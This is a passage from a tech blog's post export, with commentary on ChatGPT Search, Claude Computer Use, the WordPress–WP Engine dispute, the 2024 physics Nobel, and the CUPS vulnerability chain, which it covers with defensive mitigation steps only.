wrapper around Bing results pasted into a chat window. OpenAI has built a custom search integration that combines real-time web crawling with advanced foundation model capabilities to synthesize and summarize information. When you ask a question, ChatGPT can now pull in current information from the web, cite its sources with inline links, and present the information in a conversational format.\nThe visual presentation is clean — sources appear as clickable citations, and there\u0026rsquo;s a sidebar showing the referenced pages. You can click through to the original sources, which addresses one of the biggest criticisms of AI-generated answers: that they obscure where the information comes from.\nUnder the hood, OpenAI partnered with multiple news publishers and data providers. They\u0026rsquo;re using their own web crawler (OAI-SearchBot) alongside data partnerships to build a search index. The announcement emphasizes that publishers can control how their content appears and benefit from traffic driven by citations.\nThe Search Experience Is Different # What strikes me most isn\u0026rsquo;t the technology — it\u0026rsquo;s how differently you approach information retrieval when search is conversational. With traditional search, you\u0026rsquo;ve been trained over two decades to craft keywords, scan blue links, click through to pages, evaluate content, and synthesize your own understanding. With ChatGPT Search, you ask a question in natural language and get a synthesized answer.\nFor technical queries, this is genuinely faster. I asked about Kubernetes 1.31 deprecations, and instead of clicking through three different blog posts and cross-referencing release notes, I got a comprehensive summary with citations I could verify. For debugging-style queries (\u0026ldquo;why does my Go program panic when using sync.Map with concurrent deletes\u0026rdquo;), the conversational format lets me follow up naturally without reformulating search queries.\nBut there are trade-offs. The synthesized answers can create a false sense of completeness. When Google gives you ten blue links, you implicitly understand that you\u0026rsquo;re seeing a selection of perspectives. When ChatGPT gives you a flowing paragraph, it\u0026rsquo;s easy to forget that it\u0026rsquo;s making editorial choices about what to include and what to leave out.\nWhat This Means for Developers # If you build anything that depends on web traffic from search — documentation sites, developer blogs, tool landing pages — you need to start thinking about this now.\nThe traditional SEO playbook is about ranking in a list of links. But when an AI synthesizes content from multiple sources into a single answer, the question becomes: does your content get cited? And even if it does, will users click through when the answer is already in front of them?\nThis is the zero-click search problem that Google\u0026rsquo;s featured snippets already created, but amplified significantly. Early data from SearchGPT prototypes suggests that click-through rates to source pages are lower than traditional search, though OpenAI claims their citation-heavy approach mitigates this. As AI systems become more prevalent in information access, questions about transparency and data usage become increasingly important.\nFor developer tools and libraries, discoverability might actually improve. Right now, finding the right library for a specific task involves a lot of keyword guessing and Reddit searching. A conversational search that understands your requirements and can compare options is genuinely more useful.\nThe Infrastructure Question # Running a real-time search engine is an entirely different infrastructure challenge than running an LLM inference service. Google\u0026rsquo;s search infrastructure is one of the most sophisticated systems ever built — billions of pages indexed, updated continuously, served with sub-second latency at massive scale.\nOpenAI is entering this space as a relative newcomer to search infrastructure. The quality of results depends not just on the AI model but on the freshness and breadth of the underlying search index. Early testing shows that ChatGPT Search handles popular topics well but can struggle with very recent events (latency of hours rather than minutes) and niche topics where the index may not have comprehensive coverage.\nThere\u0026rsquo;s also the cost question. Every search query now involves not just index lookup but also LLM inference to synthesize the answer. That\u0026rsquo;s orders of magnitude more compute per query than traditional search. OpenAI\u0026rsquo;s pricing strategy will need to account for this — it\u0026rsquo;s one reason the feature is gated to paid users first.\nMy Take # I don\u0026rsquo;t think ChatGPT Search is going to replace Google next week, or next year. Google has massive advantages in index coverage, latency, and the ecosystem of specialized search features (maps, shopping, images, knowledge panels) that have accumulated over 25 years.\nBut ChatGPT Search is good enough to change behavior, and that\u0026rsquo;s what matters. For certain categories of queries — particularly research-oriented, technical, and comparison queries — the conversational format is simply superior to a list of links. I\u0026rsquo;ve caught myself reaching for ChatGPT instead of Google several times this week, and each time the experience was at least as good.\nThe real story here isn\u0026rsquo;t one product versus another. It\u0026rsquo;s the beginning of a fundamental shift in how information retrieval works. We\u0026rsquo;ve had essentially the same search paradigm since the late 1990s: type keywords, get links, click through, read. AI-powered search offers a different paradigm: describe what you need, get a synthesized answer, verify with sources. This connects to broader platform strategies like Microsoft\u0026rsquo;s AI platform approach where AI assistance is becoming central to how users interact with information.\nThat shift is going to take years to fully play out, but the starting gun has fired. If you\u0026rsquo;re building for the web, it\u0026rsquo;s time to think about what your content strategy looks like in a world where the first point of contact is an AI synthesis, not a link to your page.\nThis is part of my AI in Development series, exploring the practical impact of AI advances on software engineering.\n","date":"31 October 2024","externalUrl":null,"permalink":"/posts/241031-chatgpt-search-launches/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches ChatGPT Search, integrating real-time web search directly into its chatbot. The implications for search, SEO, and how we find information are enormous.","title":"ChatGPT Search Is Here — Should Google Be Worried?","type":"posts"},{"content":"Anthropic dropped something genuinely surprising this week. Alongside an upgraded Claude 3.5 Sonnet model that pushes the state of the art on coding benchmarks, they introduced a feature called \u0026ldquo;Computer Use\u0026rdquo; — the ability for Claude to directly see and interact with a computer screen, move the mouse, click buttons, and type text. It\u0026rsquo;s available as a public beta in the API, and after spending a couple of days experimenting with it, I think this is one of the most consequential AI releases of the year.\nWe\u0026rsquo;ve been talking about AI agents for a while now. Everyone and their startup has been promising autonomous systems that can perform complex tasks. But most of those agents work through structured APIs and carefully defined tool interfaces. What Anthropic has done is fundamentally different: they\u0026rsquo;ve given Claude the same interface a human uses. A screen. A mouse. A keyboard.\nHow Computer Use Actually Works # The technical implementation is clever. Claude takes screenshots of the desktop at regular intervals, analyzes what\u0026rsquo;s on screen using its vision capabilities, and then issues mouse movements, clicks, and keystrokes through a standardized tool interface. It\u0026rsquo;s essentially a very sophisticated screen-scraping agent, but one backed by a model that can genuinely understand what it\u0026rsquo;s looking at.\nIn the API documentation, Anthropic provides a Docker-based reference implementation that sets up a virtual desktop environment. You spin up the container, connect Claude to it, and give it natural language instructions. The model then figures out how to accomplish the task by interacting with the GUI.\nI tested it with several scenarios: filling out web forms, navigating multi-step workflows in web applications, and basic file management tasks. The results are impressive but imperfect. Claude can navigate most standard interfaces, but it occasionally misclicks, struggles with unusual UI patterns, and can get confused by popup dialogs it doesn\u0026rsquo;t expect.\nThe latency is notable too — each action requires a screenshot, API call, and response cycle, so tasks that a human could complete in seconds take minutes. But the accuracy on straightforward workflows is genuinely high.\nWhy This Matters More Than You Think # The reason Computer Use is significant isn\u0026rsquo;t because it\u0026rsquo;s polished — it\u0026rsquo;s not, and Anthropic is explicit about that. It matters because it solves the integration problem that has plagued AI agents from the start.\nEvery time you want an AI agent to interact with a tool, you traditionally need to build an API integration. Want it to work with your CRM? Build a connector. Your internal admin panel? Another connector. That legacy system from 2008 that only has a web interface? Good luck.\nComputer Use sidesteps all of that. If a human can use a tool through a screen, Claude can theoretically use it too. No API needed. No integration work. This has enormous implications for enterprise automation, where the majority of workflows still involve humans clicking through web applications.\nThink about the long tail of internal tools that will never get proper API coverage. Think about testing scenarios where you need to verify actual user-facing behavior. Think about accessibility — Computer Use could become the foundation for assistive technology that helps people interact with software that wasn\u0026rsquo;t designed with accessibility in mind.\nThe Security Implications # Now, let me put on my paranoid hat for a moment, because the security implications here are significant.\nAn AI that can see your screen and control your mouse has access to everything you can see and do. The reference implementation runs in a sandboxed Docker container, which is the right approach, but I can already imagine the pressure to run this against production environments.\nAnthropic\u0026rsquo;s documentation includes explicit warnings: don\u0026rsquo;t give Computer Use access to sensitive data, don\u0026rsquo;t let it interact with systems where mistakes have real consequences, and be cautious about prompt injection through on-screen content. That last point is critical — if Claude is reading web pages to complete tasks, a malicious page could include text designed to manipulate the AI\u0026rsquo;s behavior.\nThese aren\u0026rsquo;t hypothetical concerns. The first time someone connects Computer Use to a browser session with their banking credentials accessible, we\u0026rsquo;ll have a case study in why sandbox boundaries matter.\nThe Upgraded Model Underneath # It\u0026rsquo;s worth noting that the Claude 3.5 Sonnet upgrade itself is substantial, even apart from Computer Use. The new model scores 49.0% on SWE-bench Verified, up from 33.4% on the previous version. This aligns with broader advances in AI reasoning capabilities where models are gaining the ability to break down complex problems. The emergence of reasoning models like o1 demonstrates this trend across the industry. That\u0026rsquo;s a massive jump in the ability to solve real-world software engineering tasks.\nOn the agentic coding benchmark TAU-bench, the improvements are similarly dramatic. This suggests Anthropic has specifically optimized for the kind of multi-step reasoning and tool use that agents require. The model is getting better not just at understanding code but at executing multi-step plans involving code changes.\nFor developers who use Claude in their daily workflow, the practical impact is noticeable. Complex refactoring suggestions are more accurate, multi-file changes are more coherent, and the model handles larger contexts with less degradation.\nMy Take # I\u0026rsquo;ve been building and integrating software systems for a long time, and the moment an AI can interact with any GUI application feels like a genuine inflection point. Not because it\u0026rsquo;s ready for production — it absolutely isn\u0026rsquo;t yet — but because it removes a barrier that has kept AI agents theoretical rather than practical.\nThe most interesting applications won\u0026rsquo;t be the obvious ones. Yes, you can use it to automate form filling or data entry. But the real value will emerge in testing, in workflow automation for legacy systems, and in creating AI assistants that can meet users where they already work, rather than requiring everything to be rebuilt around API interfaces.\nAnthropic\u0026rsquo;s decision to release this as a beta, with clear warnings about its limitations, is the right approach. This mirrors how other experimental AI capabilities are reaching production maturity. The technology needs to mature, the safety guardrails need to strengthen, and the developer community needs time to establish best practices.\nBut make no mistake — the direction is clear. AI is moving from conversation to action, from text to interaction. Computer Use is an early and imperfect step, but it\u0026rsquo;s a step in a direction that will reshape how we think about automation, much like how agentic workflows are transforming development practices.\nThis is part of my AI in Development series, exploring the practical impact of AI advances on software engineering.\n","date":"24 October 2024","externalUrl":null,"permalink":"/posts/241024-anthropic-claude-computer-use/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s updated Claude 3.5 Sonnet introduces Computer Use, letting AI directly interact with desktop environments — a significant leap toward autonomous AI agents.","title":"Claude Gets Hands — Anthropic's Computer Use Changes the AI Game","type":"posts"},{"content":"The WordPress ecosystem is on fire, and not in a good way. What started as pointed remarks from Automattic CEO Matt Mullenweg at WordCamp US has spiraled into one of the most dramatic confrontations in open source history. WP Engine has been banned from WordPress.org resources, cease-and-desist letters have flown in both directions, and the community is left picking sides in a fight that touches the very foundations of how open source projects coexist with commercial interests.\nAs someone who has watched open source evolve from a fringe movement to the backbone of the modern software industry, I find this situation both deeply concerning and oddly inevitable.\nWhat Actually Happened # The timeline is dizzying. In late September, Mullenweg publicly called out WP Engine at WordCamp US, accusing them of being a \u0026ldquo;cancer to WordPress\u0026rdquo; and claiming they profit from the WordPress brand without giving back proportionally. WP Engine fired back with a cease-and-desist letter. Then Automattic blocked WP Engine\u0026rsquo;s access to WordPress.org plugin and theme repositories, effectively cutting off automatic updates for millions of sites.\nThis week, the situation has only intensified. WP Engine filed a lawsuit against Automattic, alleging abuse of power and trademark violations. Automattic, in turn, offered employees a severance package to leave if they disagreed with the company\u0026rsquo;s stance — and roughly 159 people took the deal.\nThe technical fallout is real. WP Engine customers couldn\u0026rsquo;t receive plugin updates for a period, creating genuine security concerns. A temporary reprieve was granted, but the uncertainty remains.\nThe Governance Problem Nobody Solved # Here\u0026rsquo;s the uncomfortable truth that this situation exposes: WordPress never properly separated its open source project governance from its commercial interests. WordPress.org — the repository, the plugin ecosystem, the update infrastructure — is effectively controlled by Automattic. The WordPress Foundation exists, but its role in governing the project\u0026rsquo;s infrastructure has always been murky.\nThis is not a new pattern. Similar tensions have emerged in other open source projects when licensing conflicts occur. I\u0026rsquo;ve seen similar tensions play out in other projects over the decades, each raising fundamental questions about the relationship between commercial sponsors and open source communities. The difference is that WordPress powers roughly 43% of the web. The blast radius of a governance failure here is enormous.\nCompare this to how other major projects handle the divide. The Linux Foundation, the Apache Software Foundation, the Cloud Native Computing Foundation — they all maintain explicit separation between the open source project and any single commercial entity. It\u0026rsquo;s not perfect, but it creates checks and balances.\nWordPress never built those guardrails, and now we\u0026rsquo;re seeing why they matter.\nThe \u0026ldquo;Giving Back\u0026rdquo; Debate # Mullenweg\u0026rsquo;s core argument is that WP Engine doesn\u0026rsquo;t contribute enough to the WordPress open source project relative to the revenue they generate from it. He\u0026rsquo;s proposed a framework suggesting that large WordPress hosting companies should dedicate a percentage of their resources to core development.\nThere\u0026rsquo;s a kernel of truth here. Free-riding on open source is a real problem, and many companies do extract enormous value from projects they barely contribute to. But the way this argument has been weaponized — using control over project infrastructure to punish a commercial competitor — sets a terrifying precedent.\nIf the maintainer of an open source project can unilaterally cut off access to critical infrastructure because they feel a company isn\u0026rsquo;t \u0026ldquo;contributing enough,\u0026rdquo; then every business built on open source should be worried. Who decides what \u0026ldquo;enough\u0026rdquo; means? By what process? With what accountability?\nI\u0026rsquo;ve been building software on open source foundations for three decades. The social contract has always been: the code is free, you can use it commercially, and contributions are welcomed but not coerced. Breaking that contract — even with good intentions — damages trust that took years to build.\nWhat Developers Should Watch For # If you\u0026rsquo;re running WordPress sites (and statistically, many of you are), here\u0026rsquo;s what to pay attention to:\nUpdate infrastructure: Make sure you have a plan for plugin and theme updates that doesn\u0026rsquo;t solely rely on WordPress.org. Consider manual update workflows as a backup.\nHosting diversification: If you\u0026rsquo;re on WP Engine, you\u0026rsquo;re directly affected. But even on other hosts, think about what happens if this pattern repeats with a different target.\nFork potential: There\u0026rsquo;s already talk of forking WordPress. Whether that materializes depends on how this conflict resolves, but it\u0026rsquo;s worth monitoring. A fork would fragment the ecosystem but could also lead to better governance.\nPlugin dependencies: Audit which plugins are critical to your sites and whether they have alternative distribution channels.\nMy Take # I have enormous respect for what Matt Mullenweg has built. WordPress democratized web publishing in ways that changed the internet. But this approach — using infrastructure control as a weapon in a commercial dispute — is wrong, regardless of how valid the underlying complaints about contribution might be.\nThe open source world needs to have an honest conversation about sustainability and fair contribution. But that conversation needs to happen through governance structures, not through unilateral executive action. The WordPress Foundation should be the entity making decisions about WordPress.org access, with transparent policies and due process. Governance models like OpenTofu have demonstrated what effective community-led stewardship can look like when open source projects prioritize transparency and inclusive decision-making.\nWhat we\u0026rsquo;re witnessing is what happens when a project grows to dominate a significant portion of the web without ever building the institutional frameworks to match that responsibility. With supply chain security becoming increasingly critical, governance that ensures ecosystem health and predictability is more important than ever. It\u0026rsquo;s a cautionary tale for every open source project that\u0026rsquo;s outgrowing its governance model.\nThe code may be open, but the power structures around it matter just as much.\nThis is part of my Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"17 October 2024","externalUrl":null,"permalink":"/posts/241017-wordpress-wp-engine-open-source-rift/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The WordPress/WP Engine feud has escalated into a full-blown crisis, raising fundamental questions about open source governance and commercial ecosystems.","title":"WordPress vs WP Engine — When Open Source Gets Personal","type":"posts"},{"content":"The Royal Swedish Academy of Sciences announced this week that the 2024 Nobel Prize in Physics goes to John Hopfield and Geoffrey Hinton \u0026ldquo;for foundational discoveries and inventions that enable machine learning with artificial neural networks.\u0026rdquo; For those of us working with AI every day, this feels like a moment where the broader world is catching up to what the field has known for decades: the theoretical foundations of modern AI are rooted in physics.\nBut it\u0026rsquo;s also a decision that has sparked genuine debate — both about what \u0026ldquo;physics\u0026rdquo; means in the context of the Nobel Prize, and about what this recognition signals for AI\u0026rsquo;s role in society.\nThe Science Behind the Prize # John Hopfield, now 91, created what\u0026rsquo;s known as the Hopfield network in 1982 — a form of associative memory inspired by the physics of spin glasses. Spin glasses are disordered magnetic materials studied in statistical mechanics, and Hopfield recognized that the mathematical framework used to describe them could also describe a network of artificial neurons that stores and retrieves patterns. The energy function of a Hopfield network is directly analogous to the Hamiltonian in statistical physics.\nGeoffrey Hinton, 76, built on Hopfield\u0026rsquo;s work to develop the Boltzmann machine — a type of neural network that uses principles from statistical mechanics to learn probability distributions over its inputs. The Boltzmann machine, named after the physicist Ludwig Boltzmann, uses concepts of energy and temperature to find optimal configurations, mirroring how physical systems reach equilibrium.\nHinton\u0026rsquo;s later work on backpropagation and deep learning is what most people in the tech industry know him for, but the Nobel Committee specifically cited the earlier, more physics-adjacent work. This is important context: the prize isn\u0026rsquo;t for \u0026ldquo;inventing ChatGPT\u0026rdquo; — it\u0026rsquo;s for recognizing that the mathematical structure of physics could be applied to create learning systems.\nIs This Really Physics? # The most interesting debate surrounding the announcement is whether this work truly belongs under the physics umbrella. Plenty of physicists have grumbled — politely and otherwise — that neural networks, however elegant their mathematical foundations, aren\u0026rsquo;t physics in the traditional sense. They don\u0026rsquo;t describe natural phenomena. They\u0026rsquo;re engineered systems inspired by physics, which is a different thing.\nI have some sympathy for this view. The Nobel Prize in Physics has traditionally honored discoveries about the natural world — quarks, gravitational waves, cosmic background radiation, quantum entanglement. Hopfield and Hinton didn\u0026rsquo;t discover anything about nature; they applied mathematical tools from physics to build something new.\nBut I think the committee is making a deliberate statement: the boundaries between disciplines are dissolving. The same mathematical frameworks that describe magnetic materials can describe learning systems. Statistical mechanics doesn\u0026rsquo;t care whether the \u0026ldquo;spins\u0026rdquo; in your system are iron atoms or artificial neurons. The physics is the same.\nAnd frankly, the impact is hard to argue with. The lineage from Hopfield networks through Boltzmann machines to modern deep learning is clear and well-documented. Without these foundational ideas, the AI systems we\u0026rsquo;re building today — including foundation models and their advanced reasoning capabilities — wouldn\u0026rsquo;t exist.\nHinton\u0026rsquo;s Warnings # There\u0026rsquo;s an irony in this recognition that\u0026rsquo;s hard to ignore. Geoffrey Hinton left Google in 2023 specifically so he could speak freely about the dangers of AI. He\u0026rsquo;s been vocal about existential risks, about the potential for AI to be used for misinformation and manipulation, and about the inadequacy of current safety measures. These concerns are becoming increasingly relevant as new open-source reasoning models advance the state of AI capabilities.\nNow the Nobel Committee is celebrating his work — the very work he\u0026rsquo;s spent the past year warning might lead to catastrophic outcomes. In his press conference after the announcement, Hinton reiterated his concerns about AI safety, calling for more research into how to maintain control over systems that might become more intelligent than humans.\nThis juxtaposition — celebration and warning in the same breath — feels emblematic of where we are with AI right now. The technology is simultaneously the most impressive and potentially the most dangerous thing our field has ever produced. Recognition of its scientific foundations doesn\u0026rsquo;t resolve that tension; if anything, it amplifies it.\nWhat This Means for Practitioners # For those of us building AI systems, the Nobel Prize is validation but not vindication. It validates that the field\u0026rsquo;s foundations are scientifically rigorous and important. But it doesn\u0026rsquo;t vindicate the hype, the irresponsible deployments, or the tendency to treat these systems as magical rather than mathematical.\nIf anything, recognizing AI\u0026rsquo;s roots in physics should remind us of the discipline that physics demands. Physics is built on careful experimentation, reproducible results, clear uncertainty quantification, and healthy skepticism of grand claims. These are exactly the qualities that AI development too often lacks.\nI\u0026rsquo;d love to see the ML community take this Nobel Prize as a call to be more rigorous, not less. More careful benchmarking. Better uncertainty quantification in model outputs. More honest communication about what these systems can and can\u0026rsquo;t do. The physics-inspired foundations of our field deserve physics-quality rigor in how we build on them.\nMy Take # I think this is the right prize, given to the right people, at roughly the right time. Hopfield and Hinton did foundational work that connects physics to computation in ways that have reshaped the world. Whether you call it physics or not is a semantic debate; the importance of the work is not.\nWhat I find most valuable about this recognition is that it draws attention to the theoretical foundations of AI at a time when the field is increasingly driven by engineering scale — more data, more compute, more parameters. The lesson of Hopfield and Hinton\u0026rsquo;s work is that fundamental ideas matter. The architecture of transformer networks, the mathematics of how they learn, the theoretical framework that explains why they work — these matter as much as the GPU clusters that run it.\nIn a field that\u0026rsquo;s moving faster than anyone can fully keep up with, it\u0026rsquo;s good to be reminded where we started and why the foundations matter.\nThis post is part of my ongoing AI in Development series, tracking how artificial intelligence is reshaping software engineering and beyond.\n","date":"10 October 2024","externalUrl":null,"permalink":"/posts/241010-nobel-prize-physics-ai-neural-networks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The 2024 Nobel Prize in Physics awarded to John Hopfield and Geoffrey Hinton recognizes the foundational physics-inspired work that made modern AI possible.","title":"Nobel Prize in Physics Goes to Neural Network Pioneers — What It Means for AI","type":"posts"},{"content":"The WordPress ecosystem is in turmoil, and for once, it\u0026rsquo;s not about a plugin vulnerability or a Gutenberg controversy. Over the past two weeks, Matt Mullenweg — CEO of Automattic and co-founder of WordPress — has launched an increasingly aggressive campaign against WP Engine, one of the largest WordPress hosting companies. What started as a WordCamp keynote criticizing WP Engine\u0026rsquo;s contributions to the open source project has escalated into blocked access to WordPress.org resources, legal threats, and a schism that\u0026rsquo;s shaking the foundation of the web\u0026rsquo;s most popular CMS.\nAs someone who\u0026rsquo;s built and maintained WordPress sites for clients over the years, I\u0026rsquo;m watching this unfold with a mixture of fascination and concern.\nWhat Happened # The timeline is important for understanding how quickly this escalated:\nSeptember 20: Matt Mullenweg publishes a blog post titled \u0026ldquo;WP Engine is not WordPress,\u0026rdquo; criticizing WP Engine for profiting from WordPress without contributing sufficiently to the open source project. He calls them a \u0026ldquo;cancer to WordPress.\u0026rdquo;\nSeptember 23: WP Engine sends Automattic a cease-and-desist letter regarding Mullenweg\u0026rsquo;s statements. Automattic responds with their own C\u0026amp;D, demanding WP Engine pay a trademark licensing fee for using the WordPress and WooCommerce names.\nSeptember 25: Automattic blocks WP Engine\u0026rsquo;s servers from accessing WordPress.org — the repository that hosts plugins, themes, and updates. This means WP Engine customers can\u0026rsquo;t update their plugins and themes through the normal WordPress mechanism.\nSeptember 27: After significant community backlash, the block is temporarily lifted for a \u0026ldquo;brief reprieve\u0026rdquo; to allow WP Engine customers to update their sites.\nOctober 1: The block is reinstated. WP Engine begins mirroring the WordPress.org plugin repository on their own infrastructure.\nAnd here we are, with the situation still unfolding.\nThe Underlying Issue # Strip away the personal animosity and legal posturing, and there\u0026rsquo;s a legitimate question at the core of this conflict: what obligations do companies have to the open source projects they profit from?\nWP Engine is a billion-dollar company backed by Silver Lake private equity. They built their entire business on WordPress. Mullenweg\u0026rsquo;s argument is that they contribute far too little back — in code, in community resources, in financial support — relative to what they extract.\nThere\u0026rsquo;s data to support this. WP Engine contributes relatively few hours of developer time to WordPress core compared to Automattic. Their \u0026ldquo;Five for the Future\u0026rdquo; pledge (where WordPress companies commit 5% of their resources to the project) is, by Mullenweg\u0026rsquo;s account, essentially unfulfilled.\nBut the counterargument is equally strong. WP Engine contributes to the WordPress ecosystem in other ways — through developer tools, through making WordPress hosting reliable and accessible, through employing people who build plugins and themes. The open source social contract has never required specific contribution levels, and the GPL license explicitly permits commercial use without strings attached.\nThe Governance Problem # What concerns me most isn\u0026rsquo;t the business dispute — companies fight about money and trademarks all the time. What concerns me is the governance structure that made this possible.\nWordPress.org — the repository that hosts plugins, themes, updates, and much of the project\u0026rsquo;s infrastructure — is controlled by Automattic. Or more precisely, it\u0026rsquo;s controlled by Matt Mullenweg personally. There is no independent foundation governing the project\u0026rsquo;s shared infrastructure. This stands in sharp contrast to how open source communities like OpenTofu have established governance models that prevent single-entity control. Unlike the Linux Foundation, the Apache Software Foundation, or even the Python Software Foundation, WordPress has no independent body that separates the project\u0026rsquo;s governance from any single company\u0026rsquo;s interests.\nThis means that one person can, as we\u0026rsquo;ve just seen, cut off a major hosting provider\u0026rsquo;s access to the plugin repository. That\u0026rsquo;s an enormous amount of power concentrated in a single individual, and the fact that it was exercised impulsively — in the context of what reads like a personal grudge — should alarm everyone in the WordPress ecosystem.\nThe WordPress community has tolerated this governance structure because, for twenty years, it mostly worked. Mullenweg was seen as a benevolent steward. But benevolent dictator models have a fundamental flaw: they work exactly until the dictator stops being benevolent, and there are no institutional checks to constrain them.\nImplications for the Ecosystem # The practical implications are already cascading through the WordPress world. Plugin developers are uncertain about the reliability of WordPress.org as a distribution platform. Hosting companies are evaluating whether their dependence on WordPress.org infrastructure is a business risk. Enterprise customers who chose WordPress precisely because of its open source nature are reconsidering that choice.\nSome of this will blow over. Lawsuits will be filed and settled, tempers will cool, and pragmatic business interests will eventually reassert themselves. But the fundamental trust has been damaged.\nIf you\u0026rsquo;re running WordPress at any scale, my immediate recommendation is to ensure you have local mirrors of your critical plugins and themes. Don\u0026rsquo;t assume WordPress.org will always be available when you need it. Plugin developers should consider whether distributing exclusively through WordPress.org is a risk they\u0026rsquo;re comfortable with.\nMy Take # I think Mullenweg has a legitimate grievance about large companies free-riding on WordPress without contributing proportionally. I\u0026rsquo;ve seen this pattern in many open source projects, and it\u0026rsquo;s a real problem that threatens the sustainability of critical software.\nBut the way he\u0026rsquo;s chosen to address it — using personal control over shared infrastructure as a weapon in a business dispute — is worse than the problem he\u0026rsquo;s trying to solve. He\u0026rsquo;s demonstrated that WordPress\u0026rsquo;s critical infrastructure is subject to the whims of a single individual, and that\u0026rsquo;s a systemic risk that no amount of subsequent good behavior can fully mitigate.\nThe WordPress community needs an independent foundation. Not tomorrow, not after the lawsuit — now. The project is too important, powering over 40% of the web, to have its governance depend on one person\u0026rsquo;s good judgment and emotional state. With supply chain security becoming central to how critical infrastructure is evaluated, governance transparency and accountability are no longer optional luxuries.\nOpen source has always required trust. Today, that trust is a little harder to extend.\nThis post is part of my Developer Landscape series, tracking shifts in the broader software development ecosystem.\n","date":"3 October 2024","externalUrl":null,"permalink":"/posts/241003-wordpress-wp-engine-open-source-governance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The escalating conflict between Automattic and WP Engine raises fundamental questions about open source trademarks, governance, and what happens when a project’s founder picks a fight.","title":"WordPress vs WP Engine — When Open Source Governance Gets Personal","type":"posts"},{"content":"This morning, security researcher Simone Margaritelli (evilsocket) publicly disclosed a chain of vulnerabilities in CUPS — the Common Unix Printing System — that can be exploited for remote code execution on Linux systems. The vulnerabilities, tracked as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, affect the cups-browsed service and can be triggered without authentication on systems where the service is running and reachable.\nAfter decades in this industry, you\u0026rsquo;d think I\u0026rsquo;d stop being surprised by critical vulnerabilities in forgotten infrastructure. And yet, here we are with the printing subsystem.\nThe Vulnerability Chain # The attack is elegant in its simplicity, which is exactly what makes it dangerous. Here\u0026rsquo;s how it works:\nCVE-2024-47176: cups-browsed listens on UDP port 631 and trusts any packet it receives to be a legitimate printer advertisement. There is no authentication, no validation of the source.\nCVE-2024-47076: The libcupsfilters library doesn\u0026rsquo;t sanitize the attributes returned by an attacker-controlled IPP server, allowing crafted values to flow through the system.\nCVE-2024-47175: libppd writes these unsanitized attributes into temporary PPD (PostScript Printer Description) files without validation.\nCVE-2024-47177: The cups-filters package allows arbitrary commands to be executed through the FoomaticRIPCommandLine directive in PPD files.\nChain them together: send a malicious UDP packet to port 631, advertise a fake printer with crafted attributes, and when a user tries to print to that printer, arbitrary commands execute as the lp user. On many systems, that\u0026rsquo;s enough to pivot to root.\nThe attack does require a user to initiate a print job to the fake printer, which limits the severity somewhat compared to a fully unauthenticated RCE. But the fact that the initial stage — injecting a fake printer — is completely unauthenticated and requires only a single UDP packet is concerning.\nWhy This Matters # Let\u0026rsquo;s be honest: printing on Linux has been a pain point for as long as Linux has existed. CUPS has been the de facto standard since Apple adopted it for macOS in 2002 (and subsequently acquired the project), and it\u0026rsquo;s been bundled in virtually every Linux distribution since.\nBut here\u0026rsquo;s the thing about infrastructure that \u0026ldquo;just works\u0026rdquo; (or, more accurately, \u0026ldquo;works well enough\u0026rdquo;): nobody looks at it. CUPS hasn\u0026rsquo;t received the kind of security scrutiny that high-profile components like OpenSSL, the kernel, or systemd regularly undergo. The cups-browsed service, in particular, seems to have been designed in an era when network trust was the default — an era that should have ended two decades ago.\nThe vulnerability highlights a pattern I\u0026rsquo;ve seen repeatedly in my career: the most dangerous code isn\u0026rsquo;t the code that gets the most attention. It\u0026rsquo;s the quiet, boring infrastructure code that\u0026rsquo;s been running unchanged for years, written with assumptions about trust and network topology that are no longer valid.\nImmediate Mitigation # If you\u0026rsquo;re running Linux systems — particularly servers that don\u0026rsquo;t need printing capabilities — the fix is straightforward:\n# Stop and disable cups-browsed sudo systemctl stop cups-browsed sudo systemctl disable cups-browsed # Or block UDP port 631 sudo ufw deny 631/udp For systems that do need printing, you can configure cups-browsed to restrict which sources it trusts by editing /etc/cups/cups-browsed.conf and setting BrowseRemoteProtocols to none.\nThe broader question is whether cups-browsed should be running at all on most systems. Printer auto-discovery over the network is a convenience feature, not a necessity. In most enterprise environments, printers are configured explicitly through management tools, making cups-browsed unnecessary attack surface.\nDistribution maintainers are likely to reconsider whether cups-browsed should be enabled by default. Several major distributions have it running out of the box, which means millions of Linux systems are potentially vulnerable right now.\nThe Forgotten Infrastructure Problem # This incident reminds me of Heartbleed in 2014, ShellShock later that year, and the Log4j crisis in 2021. In each case, a critical vulnerability was found in software that was ubiquitous, underfunded, and under-scrutinized. OpenSSL was maintained by two people when Heartbleed hit. Bash hadn\u0026rsquo;t been seriously audited in decades when ShellShock was discovered. Log4j was a logging library that nobody thought about until it was everywhere and exploitable.\nCUPS fits the same pattern. It\u0026rsquo;s everywhere, it\u0026rsquo;s old, and until today, nobody was particularly worried about its security posture.\nThe open source community has gotten better at funding critical infrastructure since the Core Infrastructure Initiative (now the Open Source Security Foundation) was established in response to Heartbleed. But CUPS apparently wasn\u0026rsquo;t on anyone\u0026rsquo;s radar as critical infrastructure, despite being installed on virtually every Linux system and macOS machine in the world.\nMy Take # The immediate risk is manageable. Disable cups-browsed if you don\u0026rsquo;t need it. Patch when your distribution provides updates. Audit your network for systems with UDP 631 exposed to the internet.\nThe deeper lesson is one we keep having to relearn: your attack surface includes every service running on every system, including the ones you forgot about. Especially the ones you forgot about. Security isn\u0026rsquo;t just about hardening your application code and your databases — it\u0026rsquo;s about knowing what\u0026rsquo;s running on your systems and why.\nI\u0026rsquo;ve already started an audit of what services are running by default on our infrastructure. I\u0026rsquo;d suggest you do the same. The next CUPS-style vulnerability might be in a service you\u0026rsquo;ve never even thought about.\nThis post is part of my Security in Practice series, covering real-world security events and their implications for working engineers.\n","date":"26 September 2024","externalUrl":null,"permalink":"/posts/240926-cups-vulnerability-linux-printing-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A chain of vulnerabilities in CUPS, the Linux printing system, enables remote code execution — and highlights how forgotten infrastructure becomes a security liability.","title":"CUPS Overflows — A Critical Linux Printing Vulnerability Nobody Saw Coming","type":"posts"},{"content":"Linux kernel 6.11 was released this past Sunday, and while every kernel release brings a grab bag of driver updates, performance tweaks, and architecture improvements, this one continues a trend that I find particularly 